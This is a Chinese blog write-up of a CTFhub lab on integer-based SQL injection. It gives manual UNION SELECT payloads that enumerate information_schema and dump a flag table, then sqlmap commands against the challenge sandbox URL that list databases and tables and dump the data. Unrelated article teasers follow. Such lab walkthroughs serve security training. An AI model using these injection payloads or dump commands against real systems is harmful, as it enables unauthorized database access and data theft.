您现在的位置是:首页 > 正文

[CTFhub技能树]SQL注入———整数注入

2024-04-01 00:37:43阅读 2

解法1——手注

我们启动环境之后

根据题目指示我们输入一个1

 然后我们使用order by 语句查询有多少列

有两列

然后我们可以通过 联合查询 查库名 表名 列名

查询库名

-1 union select 1,group_concat(schema_name) from information_schema.schemata

 

 查询表名

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

查询列名

-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'


 

最后就是爆字段

-1 union select 1,group_concat(flag) from flag

解法2——用SQLmap工具解开 

sqlmap直接运行不了的的 前面加个python 然后是sqlmap.py

-u后面接的URL --batch -dbs就是爆库 -o类似与一键优化运行速度

sqlmap -u http://challenge-a0a8ff09062ae5aa.sandbox.ctfhub.com:10800/?id=1 --batch -dbs -o 

 我们可以看到有注入点 他自动动注入

然后我就可以开始爆表 -D 后面接指定库名  --tables就是爆库的表

sqlmap -u http://challenge-a0a8ff09062ae5aa.sandbox.ctfhub.com:10800/?id=1 --batch -D sqli --tables -o

 

 

接下来就是爆列了

sqlmap -u http://challenge-a0a8ff09062ae5aa.sandbox.ctfhub.com:10800/?id=1 --batch -D sqli -T flag --columns -o

 

发现这个列里面有字段

直接爆出字段吧

sqlmap -u http://challenge-a0a8ff09062ae5aa.sandbox.ctfhub.com:10800/?id=1 --batch -D sqli -T flag -dump -o 

 

 

得到flag

网站文章

  • 【python教程入门学习】阿里python面试题之年薪40万

    随着人工智能时代的到来,Python工程师的需求量也在与日俱增。现在,很多知名公司都或多或少的在使用Python。而对于Python工程师来说,进入大公司,是一个新的职业起点。就给大家分享一套阿里巴巴...

    2024-04-01 00:37:37
  • 服务器SSL不安全漏洞修复方案

    服务器SSL不安全漏洞修复方案

    关于SSL POODLE漏洞 POODLE = Padding Oracle On Downgraded Legacy Encryption.是最新安全漏洞(CVE-2014-3566)的代号,俗称“贵宾犬”漏洞。 此漏洞是针对SSL3.0中CBC模式加密算法的一种padding oracle攻击,可以让攻击者获取SSL通信中的部分信息明文,如果将明文中的重要部分获取了,比如cookie,sess

    2024-04-01 00:37:30
  • 索引切片复习

    索引切片复习

    【代码】索引切片复习。

    2024-04-01 00:37:07
  • Linux常见指令(超详解哦)

    Linux常见指令(超详解哦)

    Linux与我们熟悉的Window都是操作系统,我们经常在Window操作系统的图形化界面中进行操作。其中基本的比如创建一个文件夹、在文件夹中放置文件、修改文件名、向文件中写数据、移动文件的位置、查看文件的信息、删除文件等,我们也可以打包压缩文件、解压缩文件。只是在Linux的命令行中,我们需要通过指令来实现这些操作。在本篇文章中就来介绍这些基本指令

    2024-04-01 00:37:00
  • mac 苹果电脑升级系统后蓝牙耳机只有一边有声音 苹果电脑连接耳机音质不好 苹果电脑浏览网页音视频嘈杂

    mac 苹果电脑升级系统后蓝牙耳机只有一边有声音 苹果电脑连接耳机音质不好 苹果电脑浏览网页音视频嘈杂

    环境:电脑系统:耳机:手工定制蓝牙平头耳机 蓝牙模块:高通5141情况说明:升级系统前正常升级系统后蓝牙耳机在连接成功时,双耳都有声音且正常,但是播放音乐时,仅右耳有声音。解决:mac搜索 音频MIDI设置找到输出设备,更改输出格式测试正常本教程到此结束私信博主进入QQ技术交流群~...

    2024-04-01 00:36:54
  • C语言经典题目50题

    【程序1】 题目:有1、2、3、4个数字,能组成多少个互不相同且无重复数字的三位数?都是多少? 1.程序分析:可填在百位、十位、个位的数字都是1、2、3、4。组成所有的排列后再去       掉不满足...

    2024-04-01 00:36:50
  • linux虚拟网络设备

    见:DPDK(二):准备知识7---linux虚拟网络设备 - 小蚂蚁_CYJ - 博客园

    2024-04-01 00:36:25
  • 动态加载内容爬取,Ajax爬取典例

    动态加载内容爬取,Ajax爬取典例

    本问包含内容,Ajax数据获取,线程池简单使用,xlwt模板数据写入exel有时候我们在用requests抓取页面的时候,得到的结果可能和在浏览器中看到的不一样在浏览器中可以看到正常显示的页面数据,但是使用requests得到的结果并没有。下面我们以新发地为例获取Ajax动态加载的内容。...

    2024-04-01 00:36:20
  • 再学C语言28:输入和输出——重定向和文件

    再学C语言28:输入和输出——重定向和文件

    输入重定向;输出重定向;组合重定向

    2024-04-01 00:36:12
  • JAVA-项目打Jar包和打war包

    打jar包 打war包

    2024-04-01 00:35:46